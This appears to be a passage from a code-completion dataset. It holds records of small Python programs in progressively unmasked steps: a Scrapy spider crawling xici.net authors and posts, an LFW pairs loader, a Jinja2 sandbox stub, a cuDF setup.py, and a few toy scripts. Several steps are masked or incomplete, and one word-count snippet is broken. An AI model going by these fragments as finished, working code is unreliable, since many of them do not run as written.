yield author_item\n\n def parse_post(self, response):\n post_item = get_post_item(response)\n for item_or_request in self.parse_comment(response, post_item):\n yield item_or_request\n\n def parse_comment(self, response, post_item=None):\n if not post_item:\n post_item = response.meta['post_item']\n for comment_item in get_comment_list(response):\n post_item['comment_ids'].append(comment_item['comment_id'])\n yield comment_item\n comment_next_page = get_comment_next_page(response)\n if comment_next_page:\n yield Request(url=comment_next_page, callback=self.\n parse_comment, meta={'post_item': post_item})\n else:\n yield post_item\n",
"step-5": "#! /usr/bin python3\n# -*- coding: utf-8 -*-\nfrom scrapy import Request\nfrom scrapy.linkextractors.lxmlhtml import LxmlLinkExtractor\nfrom scrapy.spiders import CrawlSpider\nfrom scrapy.spiders import Rule\n\nfrom xici_bbs.spiders.author import get_author_item\nfrom xici_bbs.spiders.comment import get_comment_list, get_comment_next_page\nfrom xici_bbs.spiders.post import get_post_item\n\n\nclass XiciSpider(CrawlSpider):\n name = 'xici'\n\n start_urls = ['http://www.xici.net']\n\n post_extract = LxmlLinkExtractor(\n allow=(\n '/d\\d+.htm',\n ),\n allow_domains=(\n 'xici.net'\n ),\n # deny=(\n #\n # ),\n deny_domains=(\n 'account.xici.net',\n )\n )\n\n author_extract = LxmlLinkExtractor(\n allow=(\n '/u\\d+$',\n '/u\\d+/$',\n ),\n allow_domains=(\n 'xici.net',\n ),\n # deny=(\n #\n # ),\n deny_domains=(\n 'account.xici.net',\n )\n )\n\n follow_extract = LxmlLinkExtractor(\n # allow=(\n # '/s/[0-9]+',\n # ),\n allow_domains=(\n 'xici.net',\n ),\n deny=(\n '/help/',\n ),\n deny_domains=(\n 'account.xici.net',\n # 'life.xici.net',\n )\n )\n\n rules = (\n Rule(author_extract, follow=True, callback='parse_author'),\n Rule(post_extract, follow=True, callback='parse_post'),\n # Rule(follow_extract, follow=True, callback='parse_follow'),\n Rule(follow_extract, follow=True),\n )\n\n # a_count = 0\n # p_count = 0\n # f_count = 0\n\n def parse_author(self, response):\n # self.a_count += 1\n # print('author: ', self.a_count, ' ', response.url)\n author_item = get_author_item(response)\n\n yield author_item\n\n def parse_post(self, response):\n # self.p_count += 1\n # print('post: ', self.p_count, ' ', response.url)\n post_item = get_post_item(response)\n\n for item_or_request in self.parse_comment(response, post_item):\n yield item_or_request\n\n # def parse_follow(self, response):\n # self.f_count += 1\n # print('follow: ', self.f_count, ' ', response.url)\n\n def parse_comment(self, response, post_item=None):\n if not post_item:\n post_item = response.meta['post_item']\n\n for comment_item in get_comment_list(response):\n post_item['comment_ids'].append(comment_item['comment_id'])\n\n yield comment_item\n\n comment_next_page = get_comment_next_page(response)\n if comment_next_page:\n yield Request(\n url=comment_next_page,\n callback=self.parse_comment,\n meta={\n 'post_item': post_item,\n }\n )\n\n else:\n yield post_item\n\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
fileName = str(input("Please write the name of the file you would like to open: "))
file_handle = open(fileName, "w")
contents = str(input("Please write the content you would like to save."))
file_handle.write(contents)
file_handle.close()
print(contents)
|
normal
|
{
"blob_id": "aed09a3c04f284fa0b8844a47c5bc9d1621a9b5f",
"index": 2034,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfile_handle.write(contents)\nfile_handle.close()\nprint(contents)\n",
"step-3": "fileName = str(input(\n 'Please write the name of the file you would like to open: '))\nfile_handle = open(fileName, 'w')\ncontents = str(input('Please write the content you would like to save.'))\nfile_handle.write(contents)\nfile_handle.close()\nprint(contents)\n",
"step-4": "fileName = str(input(\"Please write the name of the file you would like to open: \"))\n\nfile_handle = open(fileName, \"w\")\ncontents = str(input(\"Please write the content you would like to save.\"))\nfile_handle.write(contents)\nfile_handle.close()\nprint(contents)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
umur = raw_input("Berapakah umurmu?")
tinggi = raw_input("Berapakah tinggimu?")
berat = raw_input("Berapa beratmu?")
print "Jadi, umurmu adalah %r, tinggumu %r, dan beratmu %r." % (umur, tinggi, berat)
|
normal
|
{
"blob_id": "7d2335c956776fc5890a727d22540eabf2ea4b94",
"index": 5862,
"step-1": "umur = raw_input(\"Berapakah umurmu?\")\ntinggi = raw_input(\"Berapakah tinggimu?\")\nberat = raw_input(\"Berapa beratmu?\")\n\nprint \"Jadi, umurmu adalah %r, tinggumu %r, dan beratmu %r.\" % (umur, tinggi, berat)\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import os
import config as cfg
import numpy as np
class lfwdata():
def __init__(self):
self._pairs = []
pairs = open(os.path.join(cfg.LFW_IMAGEPATH, '../pairs.txt'))
pairs.readline()
for pair in pairs:
pair = pair.split()
if len(pair) == 3:
img1 = os.path.join(
pair[0], pair[0] + '_{:04d}.jpg'.format(int(pair[1])))
img2 = os.path.join(
pair[0], pair[0] + '_{:04d}.jpg'.format(int(pair[2])))
label = True
elif len(pair) == 4:
img1 = os.path.join(
pair[0], pair[0] + '_{:04d}.jpg'.format(int(pair[1])))
img2 = os.path.join(
pair[2], pair[2] + '_{:04d}.jpg'.format(int(pair[3])))
label = False
else:
assert False, pair
self._pairs.append({'img': [img1, img2], 'label': label})
print('Number of pairs: {}'.format(len(self._pairs)))
if __name__ == '__main__':
pairs = lfwdata()
|
normal
|
{
"blob_id": "ccdd7a5e0a1de75762530a7cadd919a2ee753d18",
"index": 1758,
"step-1": "<mask token>\n\n\nclass lfwdata:\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass lfwdata:\n\n def __init__(self):\n self._pairs = []\n pairs = open(os.path.join(cfg.LFW_IMAGEPATH, '../pairs.txt'))\n pairs.readline()\n for pair in pairs:\n pair = pair.split()\n if len(pair) == 3:\n img1 = os.path.join(pair[0], pair[0] + '_{:04d}.jpg'.format\n (int(pair[1])))\n img2 = os.path.join(pair[0], pair[0] + '_{:04d}.jpg'.format\n (int(pair[2])))\n label = True\n elif len(pair) == 4:\n img1 = os.path.join(pair[0], pair[0] + '_{:04d}.jpg'.format\n (int(pair[1])))\n img2 = os.path.join(pair[2], pair[2] + '_{:04d}.jpg'.format\n (int(pair[3])))\n label = False\n else:\n assert False, pair\n self._pairs.append({'img': [img1, img2], 'label': label})\n print('Number of pairs: {}'.format(len(self._pairs)))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass lfwdata:\n\n def __init__(self):\n self._pairs = []\n pairs = open(os.path.join(cfg.LFW_IMAGEPATH, '../pairs.txt'))\n pairs.readline()\n for pair in pairs:\n pair = pair.split()\n if len(pair) == 3:\n img1 = os.path.join(pair[0], pair[0] + '_{:04d}.jpg'.format\n (int(pair[1])))\n img2 = os.path.join(pair[0], pair[0] + '_{:04d}.jpg'.format\n (int(pair[2])))\n label = True\n elif len(pair) == 4:\n img1 = os.path.join(pair[0], pair[0] + '_{:04d}.jpg'.format\n (int(pair[1])))\n img2 = os.path.join(pair[2], pair[2] + '_{:04d}.jpg'.format\n (int(pair[3])))\n label = False\n else:\n assert False, pair\n self._pairs.append({'img': [img1, img2], 'label': label})\n print('Number of pairs: {}'.format(len(self._pairs)))\n\n\nif __name__ == '__main__':\n pairs = lfwdata()\n",
"step-4": "import os\nimport config as cfg\nimport numpy as np\n\n\nclass lfwdata:\n\n def __init__(self):\n self._pairs = []\n pairs = open(os.path.join(cfg.LFW_IMAGEPATH, '../pairs.txt'))\n pairs.readline()\n for pair in pairs:\n pair = pair.split()\n if len(pair) == 3:\n img1 = os.path.join(pair[0], pair[0] + '_{:04d}.jpg'.format\n (int(pair[1])))\n img2 = os.path.join(pair[0], pair[0] + '_{:04d}.jpg'.format\n (int(pair[2])))\n label = True\n elif len(pair) == 4:\n img1 = os.path.join(pair[0], pair[0] + '_{:04d}.jpg'.format\n (int(pair[1])))\n img2 = os.path.join(pair[2], pair[2] + '_{:04d}.jpg'.format\n (int(pair[3])))\n label = False\n else:\n assert False, pair\n self._pairs.append({'img': [img1, img2], 'label': label})\n print('Number of pairs: {}'.format(len(self._pairs)))\n\n\nif __name__ == '__main__':\n pairs = lfwdata()\n",
"step-5": "import os\nimport config as cfg\nimport numpy as np\n\n\nclass lfwdata():\n\n def __init__(self):\n self._pairs = []\n\n pairs = open(os.path.join(cfg.LFW_IMAGEPATH, '../pairs.txt'))\n pairs.readline()\n for pair in pairs:\n pair = pair.split()\n if len(pair) == 3:\n img1 = os.path.join(\n pair[0], pair[0] + '_{:04d}.jpg'.format(int(pair[1])))\n img2 = os.path.join(\n pair[0], pair[0] + '_{:04d}.jpg'.format(int(pair[2])))\n label = True\n elif len(pair) == 4:\n img1 = os.path.join(\n pair[0], pair[0] + '_{:04d}.jpg'.format(int(pair[1])))\n img2 = os.path.join(\n pair[2], pair[2] + '_{:04d}.jpg'.format(int(pair[3])))\n label = False\n else:\n assert False, pair\n self._pairs.append({'img': [img1, img2], 'label': label})\n\n print('Number of pairs: {}'.format(len(self._pairs)))\n\nif __name__ == '__main__':\n\n pairs = lfwdata()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import numpy as np
print(np.random.binomial(10, 0.5, 1))
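# Prints a length-1 array holding a single draw from Binomial(n=10, p=0.5), e.g. [4];
# passing a larger third argument would return that many draws.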
|
normal
|
{
"blob_id": "0a3e0eeda14e42bfff7797b3c42a0aebd9a72ade",
"index": 3212,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(np.random.binomial(10, 0.5, 1))\n",
"step-3": "import numpy as np\nprint(np.random.binomial(10, 0.5, 1))\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from typing import Any
from jinja2.environment import Environment
MAX_RANGE = ... # type: int
UNSAFE_FUNCTION_ATTRIBUTES = ... # type: Any
UNSAFE_METHOD_ATTRIBUTES = ... # type: Any
UNSAFE_GENERATOR_ATTRIBUTES = ... # type: Any
def safe_range(*args): ...
def unsafe(f): ...
def is_internal_attribute(obj, attr): ...
def modifies_known_mutable(obj, attr): ...
class SandboxedEnvironment(Environment):
sandboxed = ... # type: bool
default_binop_table = ... # type: Any
default_unop_table = ... # type: Any
intercepted_binops = ... # type: Any
intercepted_unops = ... # type: Any
def intercept_unop(self, operator): ...
binop_table = ... # type: Any
unop_table = ... # type: Any
def __init__(self, *args, **kwargs) -> None: ...
def is_safe_attribute(self, obj, attr, value): ...
def is_safe_callable(self, obj): ...
def call_binop(self, context, operator, left, right): ...
def call_unop(self, context, operator, arg): ...
def getitem(self, obj, argument): ...
def getattr(self, obj, attribute): ...
def unsafe_undefined(self, obj, attribute): ...
def call(__self, __context, __obj, *args, **kwargs): ...
class ImmutableSandboxedEnvironment(SandboxedEnvironment):
def is_safe_attribute(self, obj, attr, value): ...
|
normal
|
{
"blob_id": "697f4dd640ddba0411eb6eb68e7ce079a6330670",
"index": 9837,
"step-1": "<mask token>\n\n\nclass SandboxedEnvironment(Environment):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def intercept_unop(self, operator):\n ...\n <mask token>\n <mask token>\n\n def __init__(self, *args, **kwargs) ->None:\n ...\n\n def is_safe_attribute(self, obj, attr, value):\n ...\n\n def is_safe_callable(self, obj):\n ...\n <mask token>\n <mask token>\n\n def getitem(self, obj, argument):\n ...\n\n def getattr(self, obj, attribute):\n ...\n\n def unsafe_undefined(self, obj, attribute):\n ...\n <mask token>\n\n\nclass ImmutableSandboxedEnvironment(SandboxedEnvironment):\n\n def is_safe_attribute(self, obj, attr, value):\n ...\n",
"step-2": "<mask token>\n\n\nclass SandboxedEnvironment(Environment):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def intercept_unop(self, operator):\n ...\n <mask token>\n <mask token>\n\n def __init__(self, *args, **kwargs) ->None:\n ...\n\n def is_safe_attribute(self, obj, attr, value):\n ...\n\n def is_safe_callable(self, obj):\n ...\n\n def call_binop(self, context, operator, left, right):\n ...\n <mask token>\n\n def getitem(self, obj, argument):\n ...\n\n def getattr(self, obj, attribute):\n ...\n\n def unsafe_undefined(self, obj, attribute):\n ...\n <mask token>\n\n\nclass ImmutableSandboxedEnvironment(SandboxedEnvironment):\n\n def is_safe_attribute(self, obj, attr, value):\n ...\n",
"step-3": "<mask token>\n\n\nclass SandboxedEnvironment(Environment):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def intercept_unop(self, operator):\n ...\n <mask token>\n <mask token>\n\n def __init__(self, *args, **kwargs) ->None:\n ...\n\n def is_safe_attribute(self, obj, attr, value):\n ...\n\n def is_safe_callable(self, obj):\n ...\n\n def call_binop(self, context, operator, left, right):\n ...\n\n def call_unop(self, context, operator, arg):\n ...\n\n def getitem(self, obj, argument):\n ...\n\n def getattr(self, obj, attribute):\n ...\n\n def unsafe_undefined(self, obj, attribute):\n ...\n\n def call(__self, __context, __obj, *args, **kwargs):\n ...\n\n\nclass ImmutableSandboxedEnvironment(SandboxedEnvironment):\n\n def is_safe_attribute(self, obj, attr, value):\n ...\n",
"step-4": "<mask token>\n\n\ndef safe_range(*args):\n ...\n\n\ndef unsafe(f):\n ...\n\n\ndef is_internal_attribute(obj, attr):\n ...\n\n\n<mask token>\n\n\nclass SandboxedEnvironment(Environment):\n sandboxed = ...\n default_binop_table = ...\n default_unop_table = ...\n intercepted_binops = ...\n intercepted_unops = ...\n\n def intercept_unop(self, operator):\n ...\n binop_table = ...\n unop_table = ...\n\n def __init__(self, *args, **kwargs) ->None:\n ...\n\n def is_safe_attribute(self, obj, attr, value):\n ...\n\n def is_safe_callable(self, obj):\n ...\n\n def call_binop(self, context, operator, left, right):\n ...\n\n def call_unop(self, context, operator, arg):\n ...\n\n def getitem(self, obj, argument):\n ...\n\n def getattr(self, obj, attribute):\n ...\n\n def unsafe_undefined(self, obj, attribute):\n ...\n\n def call(__self, __context, __obj, *args, **kwargs):\n ...\n\n\nclass ImmutableSandboxedEnvironment(SandboxedEnvironment):\n\n def is_safe_attribute(self, obj, attr, value):\n ...\n",
"step-5": "from typing import Any\nfrom jinja2.environment import Environment\n\nMAX_RANGE = ... # type: int\nUNSAFE_FUNCTION_ATTRIBUTES = ... # type: Any\nUNSAFE_METHOD_ATTRIBUTES = ... # type: Any\nUNSAFE_GENERATOR_ATTRIBUTES = ... # type: Any\n\ndef safe_range(*args): ...\ndef unsafe(f): ...\ndef is_internal_attribute(obj, attr): ...\ndef modifies_known_mutable(obj, attr): ...\n\nclass SandboxedEnvironment(Environment):\n sandboxed = ... # type: bool\n default_binop_table = ... # type: Any\n default_unop_table = ... # type: Any\n intercepted_binops = ... # type: Any\n intercepted_unops = ... # type: Any\n def intercept_unop(self, operator): ...\n binop_table = ... # type: Any\n unop_table = ... # type: Any\n def __init__(self, *args, **kwargs) -> None: ...\n def is_safe_attribute(self, obj, attr, value): ...\n def is_safe_callable(self, obj): ...\n def call_binop(self, context, operator, left, right): ...\n def call_unop(self, context, operator, arg): ...\n def getitem(self, obj, argument): ...\n def getattr(self, obj, attribute): ...\n def unsafe_undefined(self, obj, attribute): ...\n def call(__self, __context, __obj, *args, **kwargs): ...\n\nclass ImmutableSandboxedEnvironment(SandboxedEnvironment):\n def is_safe_attribute(self, obj, attr, value): ...\n",
"step-ids": [
10,
11,
13,
17,
21
]
}
|
[
10,
11,
13,
17,
21
] |
import string
fhand = open("romeo-full.txt")
counts = dict()
for line in fhand:
    # completed from the truncated "line.tranc" call (assumed intent: strip punctuation, then tally words)
    line = line.translate(line.maketrans('', '', string.punctuation))
    for word in line.split():
        counts[word] = counts.get(word, 0) + 1
|
normal
|
{
"blob_id": "5493887e32dbe7ae27eca79d28da8488183b37a3",
"index": 8792,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor line in fhand:\n line.tranc\n",
"step-3": "<mask token>\nfhand = open('romeo-full.txt')\ncounts = dict()\nfor line in fhand:\n line.tranc\n",
"step-4": "import string\nfhand = open('romeo-full.txt')\ncounts = dict()\nfor line in fhand:\n line.tranc\n",
"step-5": "import string\nfhand = open(\"romeo-full.txt\")\ncounts = dict()\nfor line in fhand:\n \n line.tranc",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Copyright (c) 2018-2020, NVIDIA CORPORATION.
import os
import shutil
import subprocess
import sys
import sysconfig
from distutils.spawn import find_executable
from distutils.sysconfig import get_python_lib
import numpy as np
import pyarrow as pa
from Cython.Build import cythonize
from Cython.Distutils import build_ext
from setuptools import find_packages, setup
from setuptools.extension import Extension
import versioneer
install_requires = ["numba", "cython"]
cython_files = ["cudf/**/*.pyx"]
CUDA_HOME = os.environ.get("CUDA_HOME", False)
if not CUDA_HOME:
path_to_cuda_gdb = shutil.which("cuda-gdb")
if path_to_cuda_gdb is None:
raise OSError(
"Could not locate CUDA. "
"Please set the environment variable "
"CUDA_HOME to the path to the CUDA installation "
"and try again."
)
CUDA_HOME = os.path.dirname(os.path.dirname(path_to_cuda_gdb))
if not os.path.isdir(CUDA_HOME):
raise OSError(f"Invalid CUDA_HOME: directory does not exist: {CUDA_HOME}")
cuda_include_dir = os.path.join(CUDA_HOME, "include")
CUDF_ROOT = os.environ.get("CUDF_ROOT", "../../cpp/build/")
try:
nthreads = int(os.environ.get("PARALLEL_LEVEL", "0") or "0")
except Exception:
nthreads = 0
cmdclass = versioneer.get_cmdclass()
class build_ext_and_proto(build_ext):
def run(self):
# Get protoc
protoc = None
if "PROTOC" in os.environ and os.path.exists(os.environ["PROTOC"]):
protoc = os.environ["PROTOC"]
else:
protoc = find_executable("protoc")
if protoc is None:
sys.stderr.write("protoc not found")
sys.exit(1)
# Build .proto file
for source in ["cudf/utils/metadata/orc_column_statistics.proto"]:
output = source.replace(".proto", "_pb2.py")
if not os.path.exists(output) or (
os.path.getmtime(source) > os.path.getmtime(output)
):
with open(output, "a") as src:
src.write("# flake8: noqa" + os.linesep)
src.write("# fmt: off" + os.linesep)
subprocess.check_call([protoc, "--python_out=.", source])
with open(output, "r+") as src:
new_src_content = (
"# flake8: noqa"
+ os.linesep
+ "# fmt: off"
+ os.linesep
+ src.read()
+ "# fmt: on"
+ os.linesep
)
src.seek(0)
src.write(new_src_content)
# Run original Cython build_ext command
build_ext.run(self)
cmdclass["build_ext"] = build_ext_and_proto
extensions = [
Extension(
"*",
sources=cython_files,
include_dirs=[
"../../cpp/include/cudf",
"../../cpp/include",
os.path.join(CUDF_ROOT, "include"),
os.path.join(CUDF_ROOT, "_deps/libcudacxx-src/include"),
os.path.join(
os.path.dirname(sysconfig.get_path("include")),
"libcudf/libcudacxx",
),
os.path.dirname(sysconfig.get_path("include")),
np.get_include(),
pa.get_include(),
cuda_include_dir,
],
library_dirs=(
pa.get_library_dirs()
+ [get_python_lib(), os.path.join(os.sys.prefix, "lib")]
),
libraries=["cudf"] + pa.get_libraries() + ["arrow_cuda"],
language="c++",
extra_compile_args=["-std=c++14"],
)
]
setup(
name="cudf",
version=versioneer.get_version(),
description="cuDF - GPU Dataframe",
url="https://github.com/rapidsai/cudf",
author="NVIDIA Corporation",
license="Apache 2.0",
classifiers=[
"Intended Audience :: Developers",
"Topic :: Database",
"Topic :: Scientific/Engineering",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
],
# Include the separately-compiled shared library
setup_requires=["cython", "protobuf"],
ext_modules=cythonize(
extensions,
nthreads=nthreads,
compiler_directives=dict(
profile=False, language_level=3, embedsignature=True
),
),
packages=find_packages(include=["cudf", "cudf.*"]),
package_data=dict.fromkeys(
find_packages(include=["cudf._lib*"]), ["*.pxd"],
),
cmdclass=cmdclass,
install_requires=install_requires,
zip_safe=False,
)
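# Note: a normal build of this package (e.g. `python setup.py build_ext --inplace` or a
# pip install from source) invokes build_ext_and_proto above, which regenerates
# orc_column_statistics_pb2.py from its .proto source before cythonizing the extensions.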
|
normal
|
{
"blob_id": "b3095f181032727544ce3ee6f1ad3a70976c0061",
"index": 7892,
"step-1": "<mask token>\n\n\nclass build_ext_and_proto(build_ext):\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\nif not CUDA_HOME:\n path_to_cuda_gdb = shutil.which('cuda-gdb')\n if path_to_cuda_gdb is None:\n raise OSError(\n 'Could not locate CUDA. Please set the environment variable CUDA_HOME to the path to the CUDA installation and try again.'\n )\n CUDA_HOME = os.path.dirname(os.path.dirname(path_to_cuda_gdb))\nif not os.path.isdir(CUDA_HOME):\n raise OSError(f'Invalid CUDA_HOME: directory does not exist: {CUDA_HOME}')\n<mask token>\ntry:\n nthreads = int(os.environ.get('PARALLEL_LEVEL', '0') or '0')\nexcept Exception:\n nthreads = 0\n<mask token>\n\n\nclass build_ext_and_proto(build_ext):\n\n def run(self):\n protoc = None\n if 'PROTOC' in os.environ and os.path.exists(os.environ['PROTOC']):\n protoc = os.environ['PROTOC']\n else:\n protoc = find_executable('protoc')\n if protoc is None:\n sys.stderr.write('protoc not found')\n sys.exit(1)\n for source in ['cudf/utils/metadata/orc_column_statistics.proto']:\n output = source.replace('.proto', '_pb2.py')\n if not os.path.exists(output) or os.path.getmtime(source\n ) > os.path.getmtime(output):\n with open(output, 'a') as src:\n src.write('# flake8: noqa' + os.linesep)\n src.write('# fmt: off' + os.linesep)\n subprocess.check_call([protoc, '--python_out=.', source])\n with open(output, 'r+') as src:\n new_src_content = ('# flake8: noqa' + os.linesep +\n '# fmt: off' + os.linesep + src.read() +\n '# fmt: on' + os.linesep)\n src.seek(0)\n src.write(new_src_content)\n build_ext.run(self)\n\n\n<mask token>\nsetup(name='cudf', version=versioneer.get_version(), description=\n 'cuDF - GPU Dataframe', url='https://github.com/rapidsai/cudf', author=\n 'NVIDIA Corporation', license='Apache 2.0', classifiers=[\n 'Intended Audience :: Developers', 'Topic :: Database',\n 'Topic :: Scientific/Engineering',\n 'License :: OSI Approved :: Apache Software License',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7'], setup_requires=['cython',\n 'protobuf'], ext_modules=cythonize(extensions, nthreads=nthreads,\n compiler_directives=dict(profile=False, language_level=3,\n embedsignature=True)), packages=find_packages(include=['cudf', 'cudf.*'\n ]), package_data=dict.fromkeys(find_packages(include=['cudf._lib*']), [\n '*.pxd']), cmdclass=cmdclass, install_requires=install_requires,\n zip_safe=False)\n",
"step-3": "<mask token>\ninstall_requires = ['numba', 'cython']\ncython_files = ['cudf/**/*.pyx']\nCUDA_HOME = os.environ.get('CUDA_HOME', False)\nif not CUDA_HOME:\n path_to_cuda_gdb = shutil.which('cuda-gdb')\n if path_to_cuda_gdb is None:\n raise OSError(\n 'Could not locate CUDA. Please set the environment variable CUDA_HOME to the path to the CUDA installation and try again.'\n )\n CUDA_HOME = os.path.dirname(os.path.dirname(path_to_cuda_gdb))\nif not os.path.isdir(CUDA_HOME):\n raise OSError(f'Invalid CUDA_HOME: directory does not exist: {CUDA_HOME}')\ncuda_include_dir = os.path.join(CUDA_HOME, 'include')\nCUDF_ROOT = os.environ.get('CUDF_ROOT', '../../cpp/build/')\ntry:\n nthreads = int(os.environ.get('PARALLEL_LEVEL', '0') or '0')\nexcept Exception:\n nthreads = 0\ncmdclass = versioneer.get_cmdclass()\n\n\nclass build_ext_and_proto(build_ext):\n\n def run(self):\n protoc = None\n if 'PROTOC' in os.environ and os.path.exists(os.environ['PROTOC']):\n protoc = os.environ['PROTOC']\n else:\n protoc = find_executable('protoc')\n if protoc is None:\n sys.stderr.write('protoc not found')\n sys.exit(1)\n for source in ['cudf/utils/metadata/orc_column_statistics.proto']:\n output = source.replace('.proto', '_pb2.py')\n if not os.path.exists(output) or os.path.getmtime(source\n ) > os.path.getmtime(output):\n with open(output, 'a') as src:\n src.write('# flake8: noqa' + os.linesep)\n src.write('# fmt: off' + os.linesep)\n subprocess.check_call([protoc, '--python_out=.', source])\n with open(output, 'r+') as src:\n new_src_content = ('# flake8: noqa' + os.linesep +\n '# fmt: off' + os.linesep + src.read() +\n '# fmt: on' + os.linesep)\n src.seek(0)\n src.write(new_src_content)\n build_ext.run(self)\n\n\ncmdclass['build_ext'] = build_ext_and_proto\nextensions = [Extension('*', sources=cython_files, include_dirs=[\n '../../cpp/include/cudf', '../../cpp/include', os.path.join(CUDF_ROOT,\n 'include'), os.path.join(CUDF_ROOT, '_deps/libcudacxx-src/include'), os\n .path.join(os.path.dirname(sysconfig.get_path('include')),\n 'libcudf/libcudacxx'), os.path.dirname(sysconfig.get_path('include')),\n np.get_include(), pa.get_include(), cuda_include_dir], library_dirs=pa.\n get_library_dirs() + [get_python_lib(), os.path.join(os.sys.prefix,\n 'lib')], libraries=['cudf'] + pa.get_libraries() + ['arrow_cuda'],\n language='c++', extra_compile_args=['-std=c++14'])]\nsetup(name='cudf', version=versioneer.get_version(), description=\n 'cuDF - GPU Dataframe', url='https://github.com/rapidsai/cudf', author=\n 'NVIDIA Corporation', license='Apache 2.0', classifiers=[\n 'Intended Audience :: Developers', 'Topic :: Database',\n 'Topic :: Scientific/Engineering',\n 'License :: OSI Approved :: Apache Software License',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7'], setup_requires=['cython',\n 'protobuf'], ext_modules=cythonize(extensions, nthreads=nthreads,\n compiler_directives=dict(profile=False, language_level=3,\n embedsignature=True)), packages=find_packages(include=['cudf', 'cudf.*'\n ]), package_data=dict.fromkeys(find_packages(include=['cudf._lib*']), [\n '*.pxd']), cmdclass=cmdclass, install_requires=install_requires,\n zip_safe=False)\n",
"step-4": "import os\nimport shutil\nimport subprocess\nimport sys\nimport sysconfig\nfrom distutils.spawn import find_executable\nfrom distutils.sysconfig import get_python_lib\nimport numpy as np\nimport pyarrow as pa\nfrom Cython.Build import cythonize\nfrom Cython.Distutils import build_ext\nfrom setuptools import find_packages, setup\nfrom setuptools.extension import Extension\nimport versioneer\ninstall_requires = ['numba', 'cython']\ncython_files = ['cudf/**/*.pyx']\nCUDA_HOME = os.environ.get('CUDA_HOME', False)\nif not CUDA_HOME:\n path_to_cuda_gdb = shutil.which('cuda-gdb')\n if path_to_cuda_gdb is None:\n raise OSError(\n 'Could not locate CUDA. Please set the environment variable CUDA_HOME to the path to the CUDA installation and try again.'\n )\n CUDA_HOME = os.path.dirname(os.path.dirname(path_to_cuda_gdb))\nif not os.path.isdir(CUDA_HOME):\n raise OSError(f'Invalid CUDA_HOME: directory does not exist: {CUDA_HOME}')\ncuda_include_dir = os.path.join(CUDA_HOME, 'include')\nCUDF_ROOT = os.environ.get('CUDF_ROOT', '../../cpp/build/')\ntry:\n nthreads = int(os.environ.get('PARALLEL_LEVEL', '0') or '0')\nexcept Exception:\n nthreads = 0\ncmdclass = versioneer.get_cmdclass()\n\n\nclass build_ext_and_proto(build_ext):\n\n def run(self):\n protoc = None\n if 'PROTOC' in os.environ and os.path.exists(os.environ['PROTOC']):\n protoc = os.environ['PROTOC']\n else:\n protoc = find_executable('protoc')\n if protoc is None:\n sys.stderr.write('protoc not found')\n sys.exit(1)\n for source in ['cudf/utils/metadata/orc_column_statistics.proto']:\n output = source.replace('.proto', '_pb2.py')\n if not os.path.exists(output) or os.path.getmtime(source\n ) > os.path.getmtime(output):\n with open(output, 'a') as src:\n src.write('# flake8: noqa' + os.linesep)\n src.write('# fmt: off' + os.linesep)\n subprocess.check_call([protoc, '--python_out=.', source])\n with open(output, 'r+') as src:\n new_src_content = ('# flake8: noqa' + os.linesep +\n '# fmt: off' + os.linesep + src.read() +\n '# fmt: on' + os.linesep)\n src.seek(0)\n src.write(new_src_content)\n build_ext.run(self)\n\n\ncmdclass['build_ext'] = build_ext_and_proto\nextensions = [Extension('*', sources=cython_files, include_dirs=[\n '../../cpp/include/cudf', '../../cpp/include', os.path.join(CUDF_ROOT,\n 'include'), os.path.join(CUDF_ROOT, '_deps/libcudacxx-src/include'), os\n .path.join(os.path.dirname(sysconfig.get_path('include')),\n 'libcudf/libcudacxx'), os.path.dirname(sysconfig.get_path('include')),\n np.get_include(), pa.get_include(), cuda_include_dir], library_dirs=pa.\n get_library_dirs() + [get_python_lib(), os.path.join(os.sys.prefix,\n 'lib')], libraries=['cudf'] + pa.get_libraries() + ['arrow_cuda'],\n language='c++', extra_compile_args=['-std=c++14'])]\nsetup(name='cudf', version=versioneer.get_version(), description=\n 'cuDF - GPU Dataframe', url='https://github.com/rapidsai/cudf', author=\n 'NVIDIA Corporation', license='Apache 2.0', classifiers=[\n 'Intended Audience :: Developers', 'Topic :: Database',\n 'Topic :: Scientific/Engineering',\n 'License :: OSI Approved :: Apache Software License',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7'], setup_requires=['cython',\n 'protobuf'], ext_modules=cythonize(extensions, nthreads=nthreads,\n compiler_directives=dict(profile=False, language_level=3,\n embedsignature=True)), packages=find_packages(include=['cudf', 'cudf.*'\n ]), package_data=dict.fromkeys(find_packages(include=['cudf._lib*']), [\n 
'*.pxd']), cmdclass=cmdclass, install_requires=install_requires,\n zip_safe=False)\n",
